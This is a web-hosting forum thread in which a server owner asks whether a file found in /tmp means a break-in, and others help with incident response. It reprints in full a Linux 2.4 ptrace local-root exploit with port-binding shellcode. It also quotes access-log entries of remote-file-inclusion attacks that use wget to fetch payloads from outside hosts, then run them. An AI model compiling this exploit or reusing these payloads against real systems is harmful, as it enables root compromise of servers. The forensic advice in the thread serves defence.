hacked questions ( please help)

Discussion in 'General Discussion' started by shann, Jun 16, 2003.

  1. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    HI,

    I have found /tmp/mptrace.c. We are running Red Hat 8 with kernel 2.4.20.

    Did they attempt to hack us?

    any help is appreciated.

  2. ciphervendor

    ciphervendor Well-Known Member

    Joined:
    Aug 26, 2002
    Messages:
    1,052
    Likes Received:
    0
    Trophy Points:
    36
    What are the contents of the file? The name of the file on its own tells you nothing.

    Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.

  3. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    This is the code/

    #include <stdio.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <string.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <sys/wait.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <sys/socket.h>
    #include <linux/user.h> /* For user_regs_struct */

    #define SIZE (sizeof(shellcode)-1)

    pid_t parent=0;
    pid_t child=0;
    pid_t k_child=0;
    static int sigc=0;

    /*
    Port binding shellcode, courtesy of <anszom@v-lo.krakow.pl>
    I just changed the port no..... =p
    */

    char shellcode[]=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
    "\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
    "\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
    "\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
    "\xec\x31\xc0\x50\x66\xb8\x61\x2c\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
    "\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
    "\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
    "\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
    "\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
    "\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
    "\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
    "\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff/bin/sh";

    void sigchld() {
    sigc++;
    return;
    }

    void sigalrm() {
    fprintf(stderr,"-> Something wrong and it timeout.\n");
    exit(0);
    }

    main(int argc, char *argv[]) {

    int i, error;
    pid_t pid;

    struct user_regs_struct regs; /* Registers Structure */

    parent=getpid();

    switch (pid=fork()) {

    case -1:
    perror("Can't fork(): ");
    break;

    case 0: /* Child's thread -- The attacking thread. */

    child=getpid();
    k_child=child+1; /* Kernel child's PID... Hopefully.. */

    fprintf(stderr, "-> Parent's PID is %d. Child's PID is %d.\n", p
    arent, child);

    fprintf(stderr, "-> Attaching to %d...", k_child);

    /*
    Trying to attach to the child spawned by the kernel, which ha
    s both
    euid and egid set to 0. Child will be sent a SIGSTOP and we,
    the 'parent',
    will get a SIGCHLD. This process is not immediate. Hence, we
    need to
    wait before we continue. Otherwise, we will fail controlling
    the thread.
    */

    signal(SIGCHLD,sigchld);
    signal(SIGALRM,sigalrm);
    alarm(10);

    while ((error=ptrace(PTRACE_ATTACH,k_child,0,0)==-1) && (errno==
    ESRCH)) {
    fprintf(stderr, ".");
    }

    if (error==-1) {
    fprintf(stderr,"-> Unable to attach to %d.\n",k_child);
    exit(0);
    }

    fprintf(stderr, "\n-> Got the thread!!\n");

    /*
    Waiting for the firt SIGCHLD, which signals the end of the at
    taching action.
    */

    while(sigc<1);

    if (ptrace(PTRACE_SYSCALL,k_child,0,0)==-1) {
    fprintf(stderr,"-> Unable to setup syscall trace.\n");
    exit(0);
    }

    /*
    The thread is under our control now. Will wail for the next s
    ignal
    to inject our own code.
    */

    fprintf(stderr,"-> Waiting for the next signal...\n");
    while(sigc<2);

    if (ptrace(PTRACE_GETREGS,k_child,NULL,&regs)==-1) {
    perror("-> Unable to read registers: ");
    }

    fprintf(stderr, "-> Injecting shellcode at 0x%08x\n",regs.eip);

    for (i=0; i<=SIZE; i+=4) {
    if( ptrace(PTRACE_POKETEXT,k_child,regs.eip+i,*(int*)(sh
    ellcode+i))) {}
    }

    fprintf(stderr, "-> Bind root shell on port 24876... =p\n");

    /*
    All done. It's time to leave 'our' poor child alone.... ;)
    and get ready to kill ourselves...
    */

    if (ptrace(PTRACE_DETACH,k_child,0,0)==-1) {
    perror("-> Unable to detach from modprobe thread: ");
    }

    fprintf(stderr, "-> Detached from modprobe thread.\n");
    fprintf(stderr, "-> Committing suicide.....\n");

    if (kill(parent,9)==-1) { /* This is really ugly..... */
    perror("-> We survived??!!?? ");
    }

    /*
    We should be dead by now.
    */

    exit(0);

    break;

    default: /* Parent's thread -- The vulnerable call */

    /*
    Now, the parent is requesting a feature in a kernel module.
    Such action will trigger the kernel to spawn a child with
    euid=0, egid=0.... Voila!!!

    NB: See <linux/socket.h> for more info.
    */
    signal(SIGALRM,sigalrm);
    alarm(10);
    socket(AF_SECURITY,SOCK_STREAM,1);
    break;
    }
    exit(0);

    }

  4. ciphervendor

    ciphervendor Well-Known Member

    Joined:
    Aug 26, 2002
    Messages:
    1,052
    Likes Received:
    0
    Trophy Points:
    36
    That's the ptrace exploit code. If that was executed on your machine and you don't have a patched kernel; you're up sh*ts creek without a paddle so to speak.

  5. jmc67

    jmc67 Well-Known Member

    Joined:
    Mar 10, 2002
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    Are there any issues with cpanel and this version of the kernel?

  6. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    How could I find out whether this has been executed? Any help would be appreciated.

    thanks

  7. Admin356

    Admin356 Active Member

    Joined:
    Feb 19, 2003
    Messages:
    25
    Likes Received:
    0
    Trophy Points:
    1
    Do a grep on your users' domlogs to see where it came in from. If the file was owned by nobody, it will have been downloaded via an insecure PHP application running as the web server user.

    Quick shell script to see where it came in from:

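    #!/bin/sh
    # Scan every Apache domlog for requests containing "wget" and collect the
    # hits in ./site-log (appended, so remove an old site-log before re-running).
    # Each log's matches are followed by the log's name so they can be told apart.
    #
    # Iterating over a glob instead of `ls` output keeps log names with spaces
    # or glob characters intact; every expansion is quoted for the same reason.
    logdir=/usr/local/apache/domlogs
    for log in "$logdir"/*
    do
        # An empty directory leaves the literal pattern behind; skip it.
        [ -f "$log" ] || continue
        site=$(basename "$log")
        grep "wget" "$log" >> site-log
        echo "$site" >> site-log
        echo "$site checked"
    done
    exit 0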


    Execute that script, then read site-log afterwards; it will tell you what downloaded the file and from where. You need to block the IP of the machine used for the download (usually a free host in Brazil). The file would probably also have been executed; you will see that in the URL you find in your domlogs. The usual entry point is a client's shoutbox application.

    If you don't have a patched kernel, you may be hacked already. Run an nmap scan and look for open ports that shouldn't be there.

    Also

    ps auxf - and look for processes running under the user "nobody", either a modprobe-related process or one named after the file you removed, e.g. ./kde.

    Hope that helps.

  8. [iG]

    [iG] Member

    Joined:
    Oct 16, 2002
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Thanks for the script, you saved me oh so much time.

    cp7# cat site-log | grep wget
    grep "wget" /home2/usr/local/apache/domlogs/$site >> site-log
    200.182.136.2 - - [14/Feb/2004:11:52:31 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget HTTP/1.0" 200 15707 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
    200.182.136.2 - - [14/Feb/2004:11:52:49 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget%20-O%20/tmp/bbd%20http://portal1.homeigo.com/accounts/bbd HTTP/1.0" 200 15619 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
    200.103.84.104 - - [14/Feb/2004:18:02:32 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.103.84.104 - - [14/Feb/2004:18:03:14 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20tmp;wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.217.33.8 - - [14/Feb/2004:18:17:48 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    200.217.33.8 - - [14/Feb/2004:18:18:33 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    200.199.129.122 - - [14/Feb/2004:18:19:24 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20/tmp;wget%20http://planeta.terra.com.br/informatica/defacer/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 16790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    Funny, all Brazilian IPs. Now the script is removed, I feel secure :D
     
  9. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    netstat -lntpe

    is useful at times for matching listening ports to the executables that own them.
     